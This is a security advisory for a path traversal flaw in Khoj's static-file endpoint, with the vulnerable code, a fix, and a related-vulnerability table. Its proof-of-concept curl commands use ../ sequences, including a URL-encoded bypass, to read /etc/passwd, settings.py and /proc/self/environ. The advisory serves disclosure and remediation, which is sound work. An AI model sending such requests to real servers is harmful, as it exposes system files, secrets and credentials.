Vulnerability DatabaseGHSA-62mm-xwmv-crhg

GHSA-62mm-xwmv-crhg: 
Python vulnerability analysis and mitigation

Summary

The /home/{file_path:path} endpoint in web_client.py serves static files by directly concatenating the user-supplied file_path with the home_directory constant. There is no path traversal filtering, no path normalization check, and no authentication required. An attacker can use ../ sequences to read arbitrary files from the server filesystem.

Details

Vulnerable code — src/khoj/routers/web_client.py lines 46-49:

@web_client.get("/home/{file_path:path}", response_class=FileResponse)
def home_static_files(file_path: str):
    """Serve static files from the home landing page directory"""
    return FileResponse(constants.home_directory / file_path)

Where home_directory is defined in src/khoj/utils/constants.py line 6:

home_directory = web_directory / "home/"

What is missing:

  • No .. traversal filtering
  • No path normalization/resolution check (e.g., resolved.is_relative_to(home_directory))
  • No authentication decorator (@requires(["authenticated"]) is absent)
  • Starlette's FileResponse does NOT perform path traversal protection Path resolution:
Request: GET /home/../../../../../../../etc/passwd
file_path = "../../../../../../../etc/passwd"
home_directory / file_path = /app/src/khoj/interface/web/home/../../../../../../../etc/passwd
OS resolves to: /etc/passwd

PoC


# Read /etc/passwd (no authentication required)
curl http://localhost:42110/home/../../../../../../../etc/passwd

# Read application settings (may contain SECRET_KEY, DB credentials)
curl http://localhost:42110/home/../../../../settings.py

# Read environment file
curl http://localhost:42110/home/../../../../../../../proc/self/environ

URL-encoded variant (may bypass some reverse proxy normalization):

curl http://localhost:42110/home/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Impact

Unauthenticated arbitrary file read. An attacker with network access to the Khoj instance can:

  • Read application configuration — Django SECRET_KEY, database credentials, API keys
  • Read system files — /etc/passwd, /etc/shadow (if permissions allow), /proc/self/environ
  • Exfiltrate sensitive data — Any file readable by the server process
  • Facilitate further attacks — Leaked credentials enable deeper compromise No authentication required — the endpoint has no auth decorators, making it exploitable by any network-reachable attacker.

Use FastAPI's built-in StaticFiles mount instead of a custom handler, or add explicit path validation:

@web_client.get("/home/{file_path:path}", response_class=FileResponse)
def home_static_files(file_path: str):
    resolved = (constants.home_directory / file_path).resolve()
    if not resolved.is_relative_to(constants.home_directory.resolve()):
        raise HTTPException(status_code=404)
    return FileResponse(resolved)

Source: NVD

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-61732CRITICAL10
  • Python logoPython
  • decepticon-core
NoYesSep 24, 2026
GHSA-62mm-xwmv-crhgHIGH8.7
  • Python logoPython
  • khoj
NoYesSep 25, 2026
CVE-2026-57443HIGH7.5
  • Python logoPython
  • scbe-aethermoore
NoYesSep 25, 2026
GHSA-g28h-2cmm-rj9xHIGH7.5
  • Python logoPython
  • langchain-nvidia-ai-endpoints
NoYesSep 24, 2026
CVE-2026-57179MEDIUM4.2
  • Python logoPython
  • python3.10
NoYesSep 24, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management